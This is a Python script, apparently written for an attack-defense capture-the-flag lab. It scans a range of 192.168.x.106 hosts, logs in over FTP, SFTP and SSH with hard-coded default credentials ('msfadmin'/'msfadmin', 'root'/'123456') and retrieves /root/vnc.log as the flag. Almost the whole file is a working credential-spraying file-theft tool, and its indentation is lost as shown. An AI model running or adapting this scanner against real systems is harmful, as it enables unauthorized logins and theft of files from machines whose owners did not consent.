'''
scnaFlag.py 自动获取flag by 郑瑞国
'''
import paramiko
import webbrowser
from ftplib import FTP
import threading
import time
def webConnect(ip):
webbrowser.open('http://'+ip+'/twiki/readme.txt')
time.sleep(0.5)
def ftpConnect(ip,user,pwd):
try:
ftp = FTP()
#ftp.set_debuglevel(2)
ftp.connect(ip,21,6)
ftp.login(user,pwd)
ftp.cwd('/root')
ftp.retrbinary('RETR '+'vnc.log',open('flagvalue'+ip+'.txt','wb').write)
ftp.quit()
print(ip,'ftp get flag OK',user)
flag = open('flagvalue'+ip+'.txt','rb').readlines()
for line in flag:
print(line.decode())
except:
print(ip,'ftp no connect',user)
def ftpConnect2(ip,user,pwd):
try:
transport = paramiko.Transport((ip, 22))
transport.connect(username=user,password=pwd)
sftp = paramiko.SFTPClient.from_transport(transport)
# 将remove_path 下载到本地 local_path
sftp.get('/root/vnc.log', 'flagvalue'+ip+'.txt')
print(ip,'ftp get flag OK',user)
# 将location.py 上传至服务器 /tmp/test.py
#sftp.put('flagvalueV.txt', '/root/flagvalue.txt')
#print(ip,'ftp put flag OK',user)
transport.close()
return 1
except:
print(ip,'ftp no connect',user)
def sshConnect(ip,user,pwd):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
ssh.connect(hostname=ip,port=22,username=user,password=pwd,timeout=1)
flag = ssh.exec_command('cat /root/vnc.log')[1].readlines()
print(ip,'flag:')
for line in flag:
print(line)
ssh.close()
return 1
except:
print(ip,'ssh no connect',user)
def scanAll(firstNet,endNet,user1,pass1,user2,pass2):
for net in range(firstNet,endNet):
ip = '192.168.'+str(net)+'.106'
#print(ip)
threading._start_new_thread(webConnect,(ip,))
#time.sleep(1)
#threading._start_new_thread(sshConnect,(ip,user1,pass1))
#time.sleep(1)
threading._start_new_thread(ftpConnect,(ip,user1,pass1))
time.sleep(1)
#threading._start_new_thread(sshConnect,(ip,user2,pass2))
#time.sleep(1)
threading._start_new_thread(ftpConnect,(ip,user2,pass2))
time.sleep(1)
if __name__=='__main__':
#scanAll(firstNet,endNet,user1,pass1,user2,pass2)
scanAll(0,9,'msfadmin','msfadmin','root','123456')